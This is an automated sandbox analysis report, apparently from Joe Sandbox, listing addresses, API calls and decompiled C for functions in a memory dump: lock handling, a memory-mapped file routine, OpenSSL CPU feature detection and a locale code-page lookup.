0x00cd2a62
0x00cd2cb5
0x00cd2cb5
0x00cd2cbd
0x00cd2cc4
0x00cd2cc6
0x00cd2cc9
0x00cd2cc9
0x00cd2ce8
0x00cd2cee
0x00cd2cf1
0x00cd2d0b
0x00cd2d0b
0x00cd2a3c
0x00cd2d0d
0x00cd2d12
0x00cd2d1a
0x00cd2d20
0x00cd2d24
0x00cd30c3
0x00cd30ca
0x00cd30cc
0x00cd30d2
0x00cd30d2
0x00cd30cc
0x00cd2d2e
0x00cd2d32
0x00cd2fcf
0x00cd2fd4
0x00000000
0x00cd2d38
0x00cd2d3b
0x00cd2d3f
0x00cd2d4e
0x00cd2d57
0x00cd3149
0x00cd314a
0x00cd314e
0x00cd2dc6
0x00cd2dc6
0x00cd2dcd
0x00cd3217
0x00cd321b
0x00cd321b
0x00cd321b
0x00cd321e
0x00cd3222
0x00cd3225
0x00cd3228
0x00cd3228
0x00cd322c
0x00cd3232
0x00cd3234
0x00cd3238
0x00cd3238
0x00cd323d
0x00cd323f
0x00cd3241
0x00cd3243
0x00cd3407
0x00cd341d
0x00cd3422
0x00cd3426
0x00cd3428
0x00000000
0x00000000
0x00cd3456
0x00cd345b
0x00000000
0x00cd3249
0x00cd3249
0x00cd324e
0x00cd3250
0x00cd3252
0x00cd3256
0x00cd3290
0x00cd3290
0x00cd3292
0x00cd3292
0x00cd3296
0x00cd32aa
0x00cd32aa
0x00cd32ac
0x00cd32af
0x00cd32b8
0x00cd32bb
0x00cd32c1
0x00cd32c7
0x00cd32c9
0x00cd32cc
0x00cd32d3
0x00cd32d9
0x00cd32de
0x00000000
0x00cd32de
0x00cd3258
0x00cd3265
0x00cd3269
0x00cd326b
0x00cd326f
0x00cd3271
0x00cd3277
0x00cd3464
0x00cd3464
0x00cd3468
0x00cd346e
0x00cd347c
0x00cd3481
0x00cd3482
0x00cd3487
0x00cd348e
0x00000000
0x00cd348e
0x00cd327f
0x00cd327f
0x00cd3285
0x00000000
0x00000000
0x00cd328b
0x00000000
0x00cd328b
0x00cd3243
0x00cd2dd3
0x00cd2dd6
0x00cd2ddc
0x00cd2de3
0x00cd33bd
0x00cd33d4
0x00cd2de9
0x00cd2de9
0x00cd2de9
0x00cd2dec
0x00cd2dec
0x00cd2df5
0x00cd2e11
0x00cd2e24
0x00cd2e29
0x00cd2e2e
0x00cd2e2e
0x00000000
0x00cd2df5
0x00cd2d5d
0x00cd2d61
0x00cd2d65
0x00cd2d68
0x00cd2d6f
0x00cd317b
0x00cd317f
0x00cd3183
0x00cd3187
0x00000000
0x00cd3187
0x00cd2d75
0x00cd2d7b
0x00cd32e7
0x00cd32eb
0x00cd32ef
0x00cd32f3
0x00cd32fa
0x00cd32ff
0x00cd3303
0x00cd3305
0x00cd2d89
0x00cd2d89
0x00cd2d8e
0x00cd2d90
0x00cd2d94
0x00cd2dab
0x00cd2dab
0x00cd2dad
0x00cd2dad
0x00cd2db1
0x00cd2db5
0x00cd2dbe
0x00cd2dc0
0x00cd2dc4
0x00000000
0x00cd2dc4
0x00cd2d96
0x00cd2d98
0x00cd2da0
0x00cd3067
0x00cd3067
0x00cd306b
0x00cd3071
0x00cd3075
0x00cd3077
0x00cd3079
0x00000000
0x00cd3079
0x00cd2da6
0x00000000
0x00cd2da6
0x00000000
0x00cd330b
0x00cd2d81
0x00cd2d85
0x00000000
0x00cd2d85
0x00cd2d32
0x00cd30a3
0x00cd30a3
0x00000000
0x00cd30a3
0x00cd3203
0x00cd3203
0x00cd3209
0x00000000
0x00000000
0x00cd320f
0x00000000
0x00cd320f
0x00cd31c9
0x00cd2f0e
0x00cd2f12
0x00cd2f16
0x00cd2f1a
0x00cd2f1d
0x00cd2f24
0x00cd3190
0x00cd3194
0x00cd3198
0x00cd319c
0x00000000
0x00cd319c
0x00cd2f2a
0x00cd2f2e
0x00cd2f30
0x00cd3310
0x00cd3314
0x00cd3318
0x00cd331c
0x00cd3323
0x00cd3328
0x00cd332c
0x00cd332e
0x00cd2f3e
0x00cd2f3e
0x00cd2f43
0x00cd2f45
0x00cd2f47
0x00cd2f49
0x00cd2f60
0x00cd2f60
0x00cd2f62
0x00cd2f62
0x00cd2f66
0x00cd2f6a
0x00cd2f73
0x00cd2f75
0x00cd2f79
0x00cd2f7b
0x00cd2f80
0x00cd2f82
0x00000000
0x00000000
0x00000000
0x00cd2f82
0x00cd2f4b
0x00cd2f4d
0x00cd2f4f
0x00cd2f55
0x00000000
0x00000000
0x00cd2f5b
0x00000000
0x00cd2f5b
0x00cd3334
0x00000000
0x00cd3334
0x00cd2f36
0x00cd2f3a
0x00000000
0x00cd2f3a
0x00cd2ee0
0x00cd2bab
0x00cd2ab0
0x00cd2a8b
0x00cd29f0
0x00cd29f5
0x00cd29ff
0x00cd350d
0x00cd350e
0x00000000
0x00cd350e
0x00cd2a05
0x00cd2a0d
0x00000000
0x00000000
0x00cd2a15
0x00000000
0x00000000
0x00000000

APIs

TryAcquireSRWLockExclusive.KERNEL32(00000040), ref: 00CD2FEA
TryAcquireSRWLockExclusive.KERNEL32(00000040,?,FFFFFFFF), ref: 00CD31AE
TryAcquireSRWLockExclusive.KERNEL32(00000040), ref: 00CD322C
ReleaseSRWLockExclusive.KERNEL32(00000040), ref: 00CD32D3
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CD33A9
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CD3520

Strings

first, xrefs: 00CD307A, 00CD3477
A, xrefs: 00CD2C7A

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: A$first
API String ID: 17069307-3078553561
Opcode ID: 86b8077e5ba3a3f65cb6a59d19d857ca6b22c49dbf845b2922f864b102da5216
Instruction ID: 44f2439a27ff755efe666486eddd6fc35271ecec5ee2b83fa0a314f6d0eedd95
Opcode Fuzzy Hash: 86b8077e5ba3a3f65cb6a59d19d857ca6b22c49dbf845b2922f864b102da5216
Instruction Fuzzy Hash: B35231726047418BD318CF28C49073AB7E2FF94314F18862EEA968B395DB35DE46DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CCAAE0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 218
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00CCAAE0(void* __ebx, void* __ecx, signed int __edx, void* __eflags, void* __fp0, intOrPtr* _a4, signed int _a8) {
				void* _v16;
				signed int _v24;
				char _v96;
				long _v108;
				long _v112;
				long _v116;
				struct _SECURITY_ATTRIBUTES* _v120;
				signed int _v124;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t67;
				signed int _t71;
				long _t109;
				signed int _t143;
				long _t155;
				void* _t164;
				signed int _t168;
				signed int _t170;
				void* _t173;
				void* _t177;

				_t186 = __fp0;
				_t177 = __eflags;
				_t143 = __edx;
				_push(__ebx);
				_t164 = __ecx;
				_t63 =  *0xd40014; // 0xfbddd969
				_v24 = _t63 ^ _t168;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x50], xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x20], xmm0");
				_t155 =  &_v112;
				L00CC4C80(_t155, "MapFileRegionToMemory", "..\\..\\base\\files\\memory_mapped_file_win.cc", 0x3a);
				_t173 = (_t170 & 0xfffffff0) - 0x70 + 0x10;
				L00CC9DD0(__ebx,  &_v96, _t143, _t177, __fp0, _t155, 0);
				_t67 = E00CC07B0(_t164);
				_t109 = 0;
				if(_t67 == 0) {
					L16:
					E00CFE643(L00CC9E30( &_v96, _t143, _t186), _t109, _v24 ^ _t168, _t143, _t155, _t164);
					return _t109;
				} else {
					_t71 = _a8;
					if(_t71 > 3) {
						_t155 = 0;
						__eflags = 0;
						goto L8;
					} else {
						switch( *((intOrPtr*)(_t71 * 4 +  &M00D35FA4))) {
							case 0:
								_t155 = 2;
								goto L8;
							case 1:
								__edi = 4;
								goto L8;
							case 2:
								__ebx =  *((intOrPtr*)(__ecx + 8));
								__edi = 4;
								L8:
								_t73 = CreateFileMappingW(E00CC07C0(_t164), 0, _t155, 0, _t109, 0);
								_t111 = _t73;
								_v124 = _t155;
								if( *(_t164 + 0x24) != _t73) {
									_t155 = GetLastError();
									if( *(_t164 + 0x24) + 1 >= 2) {
										L00CC4CB0();
										L00CC4CC0( *(_t164 + 0x24));
										_t173 = _t173 + 4;
										 *(_t164 + 0x24) = 0;
									}
									if(_t111 + 1 >= 2) {
										 *(_t164 + 0x24) = _t111;
										L00CC4CB0();
									}
									SetLastError(_t155);
									_t111 =  *(_t164 + 0x24);
								}
								_t112 = _t111 + 1;
								if(_t112 >= 2) {
									_v116 = 0;
									_t157 = _a4;
									__eflags = L00CCAE10(_t157, 0xd35fb8);
									if(__eflags == 0) {
										_v108 = 0;
										_v112 = 0;
										_v120 = 0;
										_push( &_v116);
										L00CCAF10( *_t157,  *((intOrPtr*)(_t157 + 4)),  *(_t157 + 8),  &_v112,  &_v120);
										_t173 = _t173 + 0x18;
										_t143 =  *(_t157 + 8);
										_t78 = _v116;
										_t79 = _t78 + _t143;
										asm("adc ecx, 0x0");
										_t155 =  ~(_t78 >> 0x0000001f & 0x00000001);
										_t113 = _t112 & 0xffffff00 | __eflags != 0x00000000;
										_t130 = _v108;
										__eflags = _t130;
										if(_t130 < 0) {
											goto L15;
										} else {
											__eflags = _t113;
											if(_t113 != 0) {
												goto L15;
											} else {
												__eflags = _t155;
												if(_t155 < 0) {
													goto L15;
												} else {
													_t114 = _v112;
													 *(_t164 + 0x20) = _t143;
													goto L24;
												}
											}
										}
									} else {
										_t99 = E00CC09A0(_t112, _t164, _t143, __eflags, _t186);
										asm("adc edx, 0xffffffff");
										_t109 = 0;
										_t155 = 0xfffffffe;
										__eflags = 0xfffffffe - _t99 + 0xffffffff;
										asm("sbb ecx, edx");
										if(0xfffffffe < _t99 + 0xffffffff) {
											goto L16;
										} else {
											 *(_t164 + 0x20) = _t99;
											_t130 = 0;
											_t79 = 0;
											L24:
											_t115 = MapViewOfFile( *(_t164 + 0x24), (_v124 & 0x00000002) + 2, _t130, _t114, _t79);
											_t81 =  *(_t164 + 0x1c);
											_t148 = _t81 >> 0x13;
											__eflags = _t148;
											asm("bt edx, ecx");
											if(_t148 < 0) {
												_push(_t81);
												L00CBEA30(_t81, _t186);
												_t173 = _t173 + 4;
											}
											_t134 = _t115 >> 0xe;
											_t143 = 1 << _t134;
											_t155 = _t115 >> 0x13;
											__eflags = _t155;
											asm("bt eax, ecx");
											if(_t155 >= 0) {
												_t84 = _t115 >> 0x15;
												__eflags = _t84;
												 *((char*)(_t84 + 0xd50a6c)) = 1;
											} else {
												_push(_t115);
												_v124 = _t143;
												L00CBE930();
												_t143 = _v124;
												_t173 = _t173 + 4;
											}
											 *(_t164 + 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 == 0) {
												goto L15;
											} else {
												_t85 = _v116;
												__eflags =  *(0xd48a6c + _t155 * 4) & _t143;
												if(( *(0xd48a6c + _t155 * 4) & _t143) == 0) {
													L32:
													 *(_t164 + 0x1c) = _t115 + _t85;
													_t109 = 1;
													goto L16;
												} else {
													_t155 = _t85;
													_t86 = L00CBECD0(_t115, _t85);
													_t175 = _t173 + 8;
													__eflags = _t86;
													_t85 = _t155;
													if(_t86 == 0) {
														asm("int3");
														asm("ud2");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_push(_t168);
														_push(_t155);
														_push(_t164);
														_t166 = _t134;
														_t161 = GetLastError();
														_t88 =  *(_t166 + 0x1c);
														__eflags = _t88;
														if(_t88 != 0) {
															UnmapViewOfFile(_t88);
														}
														__eflags =  &( *(_t166 + 0x24)->nLength) - 2;
														if( &( *(_t166 + 0x24)->nLength) >= 2) {
															L00CC4CB0();
															L00CC4CC0( *(_t166 + 0x24));
															_t175 = _t175 + 4;
															 *(_t166 + 0x24) = 0;
														}
														_t91 = E00CC07B0(_t166);
														__eflags = _t91;
														if(_t91 != 0) {
															E00CC07D0(_t115, _t166, _t143, _t186);
														}
														SetLastError(_t161);
														_t92 =  *(_t166 + 0x1c);
														_t152 = _t92 >> 0x13;
														__eflags = _t152;
														asm("bt edx, ecx");
														if(_t152 < 0) {
															_push(_t92);
															_t92 = L00CBEA30(_t92, _t186);
														}
														 *(_t166 + 0x1c) = 0;
														 *(_t166 + 0x20) = 0;
														return _t92;
													} else {
														goto L32;
													}
												}
											}
										}
									}
								} else {
									L15:
									_t109 = 0;
									goto L16;
								}
								goto L43;
							case 3:
								__esp = __esp - 4;
								__ecx = __esi;
								__ebx = E00CCA940(__ecx, __edx, __eflags, __fp0);
								goto L16;
						}
					}
				}
				L43:
			}

0x00ccaae0
0x00ccaae0
0x00ccaae0
0x00ccaae3
0x00ccaaec
0x00ccaaee
0x00ccaaf5
0x00ccaaf9
0x00ccaafd
0x00ccab03
0x00ccab09
0x00ccab0f
0x00ccab15
0x00ccab26
0x00ccab2b
0x00ccab35
0x00ccab3c
0x00ccab41
0x00ccab45
0x00ccabf0
0x00ccabff
0x00ccac0d
0x00ccab4b
0x00ccab4b
0x00ccab54
0x00ccab83
0x00ccab83
0x00000000
0x00ccab56
0x00ccab56
0x00000000
0x00ccab5d
0x00000000
0x00000000
0x00ccab7c
0x00000000
0x00000000
0x00ccab64
0x00ccab67
0x00ccab85
0x00ccab95
0x00ccab9b
0x00ccaba0
0x00ccaba4
0x00ccabac
0x00ccabb5
0x00ccabb7
0x00ccabbf
0x00ccabc4
0x00ccabc7
0x00ccabc7
0x00ccabd4
0x00ccabd6
0x00ccabd9
0x00ccabd9
0x00ccabdf
0x00ccabe5
0x00ccabe5
0x00ccabe8
0x00ccabec
0x00ccac10
0x00ccac18
0x00ccac27
0x00ccac29
0x00ccac55
0x00ccac5d
0x00ccac65
0x00ccac75
0x00ccac84
0x00ccac89
0x00ccac8c
0x00ccac8f
0x00ccac98
0x00ccac9a
0x00ccaca2
0x00ccaca6
0x00ccaca9
0x00ccacad
0x00ccacaf
0x00000000
0x00ccacb5
0x00ccacb5
0x00ccacb7
0x00000000
0x00ccacbd
0x00ccacbd
0x00ccacbf
0x00000000
0x00ccacc5
0x00ccacc5
0x00ccacc9
0x00000000
0x00ccacc9
0x00ccacbf
0x00ccacb7
0x00ccac2b
0x00ccac2d
0x00ccac37
0x00ccac3a
0x00ccac3c
0x00ccac41
0x00ccac48
0x00ccac4a
0x00000000
0x00ccac4c
0x00ccac4c
0x00ccac4f
0x00ccac51
0x00ccaccc
0x00ccace3
0x00ccace5
0x00ccacef
0x00ccacef
0x00ccacf9
0x00ccacfc
0x00ccacfe
0x00ccacff
0x00ccad04
0x00ccad04
0x00ccad09
0x00ccad11
0x00ccad15
0x00ccad15
0x00ccad1f
0x00ccad22
0x00ccad39
0x00ccad39
0x00ccad3c
0x00ccad24
0x00ccad24
0x00ccad25
0x00ccad29
0x00ccad2e
0x00ccad32
0x00ccad32
0x00ccad43
0x00ccad46
0x00ccad48
0x00000000
0x00ccad4e
0x00ccad4e
0x00ccad52
0x00ccad59
0x00ccad6d
0x00ccad6f
0x00ccad72
0x00000000
0x00ccad5b
0x00ccad5d
0x00ccad5f
0x00ccad64
0x00ccad67
0x00ccad69
0x00ccad6b
0x00ccad79
0x00ccad7a
0x00ccad7c
0x00ccad7d
0x00ccad7e
0x00ccad7f
0x00ccad80
0x00ccad83
0x00ccad84
0x00ccad85
0x00ccad8d
0x00ccad8f
0x00ccad92
0x00ccad94
0x00ccad97
0x00ccad97
0x00ccada1
0x00ccada4
0x00ccada6
0x00ccadae
0x00ccadb3
0x00ccadb6
0x00ccadb6
0x00ccadbf
0x00ccadc4
0x00ccadc6
0x00ccadca
0x00ccadca
0x00ccadd0
0x00ccadd6
0x00ccade0
0x00ccade0
0x00ccadea
0x00ccaded
0x00ccadef
0x00ccadf0
0x00ccadf5
0x00ccadf8
0x00ccadff
0x00ccae09
0x00000000
0x00000000
0x00000000
0x00ccad6b
0x00ccad59
0x00ccad48
0x00ccac4a
0x00ccabee
0x00ccabee
0x00ccabee
0x00000000
0x00ccabee
0x00000000
0x00000000
0x00ccab6e
0x00ccab71
0x00ccab78
0x00000000
0x00000000
0x00ccab56
0x00ccab54
0x00000000

APIs

CreateFileMappingW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00CCAB95
GetLastError.KERNEL32 ref: 00CCABA6
SetLastError.KERNEL32(00000000), ref: 00CCABDF
MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 00CCACDD

Strings

..\..\base\files\memory_mapped_file_win.cc, xrefs: 00CCAB1B
MapFileRegionToMemory, xrefs: 00CCAB20

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ErrorFileLast$CreateMappingView
String ID: ..\..\base\files\memory_mapped_file_win.cc$MapFileRegionToMemory
API String ID: 2231327692-2123313340
Opcode ID: d3c30ca28dca910f7d73bc5ea6849aea96dd3651f1a7dc105e1892f457baf6e9
Instruction ID: fe2b18c0067d796b834c07d668490ad2ebf13589979ad77d1bef4b21c86e0c81
Opcode Fuzzy Hash: d3c30ca28dca910f7d73bc5ea6849aea96dd3651f1a7dc105e1892f457baf6e9
Instruction Fuzzy Hash: B47125716043049FD7149F28CC9AF2BB7A6EBC8314F144A2DF99687781EB71ED058792

Uniqueness

Uniqueness Score: -1.00%

Function 00CEC6A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 24%

			E00CEC6A0(signed int __edx, void* __edi) {
				signed int _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __ebx;
				void* __esi;
				void* _t49;
				signed int _t51;
				signed char _t54;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t73;
				signed int _t77;
				signed int _t82;
				signed int _t85;
				signed int _t101;
				signed int _t104;
				signed int _t109;
				void* _t111;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				void* _t125;
				void* _t126;
				void* _t127;
				signed int _t129;
				void* _t131;

				_t101 = __edx;
				_pop(_t121);
				_push(_t62);
				_push(__edi);
				_t126 = _t125 - 0xc;
				asm("cpuid");
				if(_t62 != 0x756e6547 || __edx != 0x49656e69) {
					_t62 = _t62 ^ 0x68747541;
					_t101 = _t101 ^ 0x69746e65 | _t62;
					_t6 = __eflags == 0;
					__eflags = _t6;
					_v24 = (0x444d4163 | _t101) & 0xffffff00 | _t6;
					_v28 = 0;
				} else {
					_v28 = 0xbadbad;
					_v24 = 0;
				}
				_t73 = 0;
				_t109 = 0;
				if(0 >= 7) {
					_t73 = 0;
					asm("cpuid");
					_t109 = _t62;
				}
				_v32 = _t73;
				asm("cpuid");
				_t63 = 0;
				_t113 = _t101;
				if(_v24 != 0 && (0xb00 != 0 || 0xad < 8 || 0xad == 8 && 1 >= 0x70 && 0xad <= 0x7f)) {
					_t63 = _t63 & 0xbfffffff;
				}
				_t114 = _t113 & 0xafefffff;
				if(_v28 == 0) {
					_t115 = _t114 | 0x10000000;
					__eflags = _t115;
				} else {
					_t115 = _t114 | 0x50000000;
					if(0 == 0x80650 || 0 == 0x50670) {
						_t63 = _t63 & 0xfbffffff;
					}
				}
				if((_t63 & 0x08000000) == 0) {
					L22:
					_t64 = _t63 & 0xefffe7ff;
					_t109 = _t109 & 0x3fdeffdf;
					__eflags = _t109;
				} else {
					asm("xgetbv");
					if(4 != 0) {
						goto L22;
					} else {
						_t64 = _t63 & 0xfffff7ff;
					}
				}
				_t77 =  ==  ? _t109 : _t109 & 0xfffeffff;
				_t47 =  !=  ? _t77 : _t77 & 0xfff7ffff;
				 *0xd560fc = _t115;
				 *0xd56100 = _t64;
				 *0xd56104 =  !=  ? _t77 : _t77 & 0xfff7ffff;
				 *0xd56108 = _v32;
				_t49 = E00D0D014(_t64, _t109, _t115, _t64 & 0x04000000, "OPENSSL_ia32cap");
				_t127 = _t126 + 4;
				if(_t49 == 0) {
					L26:
					return _t49;
				} else {
					L27();
					_t49 = E00D01300(_t49, 0x3a);
					_t127 = _t127 + 8;
					if(_t49 == 0) {
						goto L26;
					} else {
						_t104 = _t49 + 1;
						_t129 = _t127 + 0xc;
						_pop(_t118);
						_pop(_t111);
						_pop(_t66);
						_pop(_t123);
						_t124 = _t129;
						_t131 = (_t129 & 0xfffffff8) - 0x10;
						_t51 =  *0xd40014; // 0xfbddd969
						_v16 = _t51 ^ _t129;
						_t67 =  *_t104 & 0x000000ff;
						_t54 = 0 | _t67 == 0x0000007e;
						_t82 = (0xd56100 | _t67 == 0x0000007c | _t54) & 0x000000ff;
						if( *((char*)(_t104 + _t82)) != 0x30) {
							_v24 = 0xffffffff;
							_v28 = 0xffffffff;
							goto L31;
						} else {
							_v24 = 0xffffffff;
							_v28 = 0xffffffff;
							if( *((char*)(_t82 + _t104 + 1)) != 0x78) {
								L31:
								_t104 = _t104 + _t54;
								__eflags = _t104;
								_push(_t131);
								_push("%llu");
								_push(_t104);
							} else {
								_push(_t131);
								_push("%llx");
								_push(_t54 + _t104 + 2);
							}
						}
						if(L00CA9C53(_t104) != 0) {
							_t85 = _v28;
							_t56 = _v24;
							if(_t67 != 0x7e) {
								__eflags = _t67 - 0x7c;
								if(_t67 != 0x7c) {
									 *0xd56104 = _t85;
									 *0x00D56108 = _t56;
								} else {
									 *0xd56104 =  *0xd56104 | _t85;
									 *0x00D56108 =  *0x00D56108 | _t56;
								}
							} else {
								 *0xd56104 =  *0xd56104 &  !_t85;
								 *0x00D56108 =  *0x00D56108 & _t56;
							}
						}
						return E00CFE643(_t56, _t67, _v16 ^ _t124, _t104, _t111, 0xd56104);
					}
				}
			}

0x00cec6a0
0x00cec6a3
0x00cfc1e3
0x00cfc1e4
0x00cfc1e6
0x00cfc1ed
0x00cfc1f5
0x00cfc214
0x00cfc220
0x00cfc22a
0x00cfc22a
0x00cfc22d
0x00cfc230
0x00cfc1ff
0x00cfc208
0x00cfc20b
0x00cfc20b
0x00cfc237
0x00cfc239
0x00cfc241
0x00cfc248
0x00cfc24a
0x00cfc24c
0x00cfc24c
0x00cfc24e
0x00cfc258
0x00cfc25a
0x00cfc25c
0x00cfc262
0x00cfc29e
0x00cfc29e
0x00cfc2a4
0x00cfc2ae
0x00cfc2d1
0x00cfc2d1
0x00cfc2b0
0x00cfc2b0
0x00cfc2c0
0x00cfc2c9
0x00cfc2c9
0x00cfc2c0
0x00cfc2df
0x00cfc2f7
0x00cfc2f7
0x00cfc2fd
0x00cfc2fd
0x00cfc2e1
0x00cfc2e3
0x00cfc2ed
0x00000000
0x00cfc2ef
0x00cfc2ef
0x00cfc2ef
0x00cfc2ed
0x00cfc30f
0x00cfc31f
0x00cfc322
0x00cfc328
0x00cfc32e
0x00cfc336
0x00cfc340
0x00cfc345
0x00cfc34a
0x00cfc37d
0x00cfc384
0x00cfc34c
0x00cfc355
0x00cfc35d
0x00cfc362
0x00cfc367
0x00000000
0x00cfc369
0x00cfc36f
0x00cfc371
0x00cfc374
0x00cfc375
0x00cfc376
0x00cfc377
0x00cfc391
0x00cfc398
0x00cfc39d
0x00cfc3a4
0x00cfc3a8
0x00cfc3b0
0x00cfc3bb
0x00cfc3c2
0x00cfc3ea
0x00cfc3f2
0x00000000
0x00cfc3c4
0x00cfc3c9
0x00cfc3d1
0x00cfc3d8
0x00cfc3f9
0x00cfc3f9
0x00cfc3f9
0x00cfc3fd
0x00cfc3fe
0x00cfc403
0x00cfc3da
0x00cfc3e1
0x00cfc3e2
0x00cfc3e7
0x00cfc3e7
0x00cfc3d8
0x00cfc40e
0x00cfc410
0x00cfc413
0x00cfc41a
0x00cfc427
0x00cfc42a
0x00cfc433
0x00cfc435
0x00cfc42c
0x00cfc42c
0x00cfc42e
0x00cfc42e
0x00cfc41c
0x00cfc41e
0x00cfc422
0x00cfc422
0x00cfc41a
0x00cfc449
0x00cfc449
0x00cfc367

APIs

___from_strstr_to_strchr.LIBCMT ref: 00CFC35D

Strings

OPENSSL_ia32cap, xrefs: 00CFC33B
ntel, xrefs: 00CFC1FF
Genu, xrefs: 00CFC1EF
ineI, xrefs: 00CFC1F7

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ___from_strstr_to_strchr
String ID: Genu$OPENSSL_ia32cap$ineI$ntel
API String ID: 601868998-3767422159
Opcode ID: 5c309c539d19d2b94c1818a0ba21393b2e3ab246130699f86b06b2024aaa14c8
Instruction ID: fef14401fe8a7e942afe6db1ddf9d7b1b7c519a31c3ae8dd0770928eb0bf16f2
Opcode Fuzzy Hash: 5c309c539d19d2b94c1818a0ba21393b2e3ab246130699f86b06b2024aaa14c8
Instruction Fuzzy Hash: 584129B2F0470D07EF9C85B9AED63BE7681DB95371F24423EDB26D32D1D924CA4481A2

Uniqueness

Uniqueness Score: -1.00%

Function 00D1A9B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00D1A9B7(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = L00D20E60(_t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
